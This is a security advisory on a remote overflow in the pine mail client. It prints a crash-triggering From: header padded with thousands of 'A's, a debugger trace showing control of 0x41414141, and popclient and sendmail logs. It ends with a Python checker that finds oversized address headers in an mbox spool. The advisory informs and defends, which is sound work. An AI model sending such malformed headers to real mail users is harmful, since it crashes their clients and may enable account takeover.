COMMAND

    pine

SYSTEMS AFFECTED

    Most unices running pine

PROBLEM

    Michal Zalewski found a silly remote overflow in pine. It's so
    simple there's no need to describe it:

        From: Michal Zalewski
        <lcamtuf@AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA>

    ...and any attempt to read this mail will cause:

        Program received signal SIGSEGV, Segmentation fault.
        0x41414141 in ?? ()

    Also, attempting to so much as download *THIS* email will cause a
    panic in 'popclient'. Pine is fine, but popclient can't retrieve
    email past this message.

        > RETR 9
        +OK 3897 octets.
        (56 lines of message content)
        > DELE 1094795585
        doPOP3: cleanUp: Bad file descriptor

    It can be exploited to gain access to remote/local accounts.
    Fortunately, overly long headers are destroyed by sendmail during
    prescan (maybe there's a way to split the long line using encoding
    tricks):

        Jun 17 16:49:24 genome sendmail[689]: QAA00689: SYSERR(root): prescan: token too long

    But other mail daemons aren't so strict - there it works. One
    report says fetchmail (release 3.8 pl 0) is OK, while another
    states the same problem exists using fetchpop with procmail. Pine
    3.96 seems to be OK. BTW, when you try to take the address from
    the e-mail it crashes too. So don't press "t".

SOLUTION

   The only way to get rid of the offending message is by hand.
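
    To find the offending message in a spool before removing it by
    hand, a check like the following can help. It is an added example,
    not part of the original advisory; the function names, the sample
    spool and the 256-octet threshold (the RFC 5321 limit for an
    address path) are assumptions made for illustration.

```python
import re

# Assumption: 256 octets is the RFC 5321 limit for a full address path, so a
# longer unbroken token in an address header is treated as suspect.
MAX_TOKEN = 256
ADDRESS_HEADERS = {"from", "to", "cc", "reply-to", "sender", "return-path"}

def split_mbox(text):
    """Yield each message of an mbox-format string as a list of lines."""
    msg = []
    for line in text.splitlines():
        if line.startswith("From ") and msg:   # mbox separator line
            yield msg
            msg = []
        msg.append(line)
    if msg:
        yield msg

def unfolded_headers(lines):
    """Yield (name, value) pairs, joining folded continuation lines."""
    name, value = None, ""
    for line in lines:
        if line == "":                          # blank line ends the headers
            break
        if line[:1] in (" ", "\t") and name:
            value += " " + line.strip()
        elif ":" in line and not line.startswith("From "):
            if name:
                yield name, value
            name, value = (p.strip() for p in line.split(":", 1))
    if name:
        yield name, value

def find_oversized(text, limit=MAX_TOKEN):
    """Return [(message_index, header_name, longest_token_length), ...]."""
    hits = []
    for idx, lines in enumerate(split_mbox(text), start=1):
        for name, value in unfolded_headers(lines):
            longest = max(len(t) for t in re.split(r"[\s,;]+", value))
            if name.lower() in ADDRESS_HEADERS and longest > limit:
                hits.append((idx, name, longest))
    return hits

# Constructed sample spool: message 2 mimics the oversized From: address above.
SAMPLE = (
    "From alice@example.org Tue Jun 17 16:40:00 1997\n"
    "From: Alice <alice@example.org>\nSubject: hello\n\nbody\n"
    "From bob@example.org Tue Jun 17 16:49:00 1997\n"
    "From: Bob\n\t<bob@" + "A" * 1000 + ">\nSubject: test\n\nbody\n"
)
```

    Headers are unfolded before measuring, so an address split across
    continuation lines is still counted as written. The message index
    returned is the position in the spool, counted from 1.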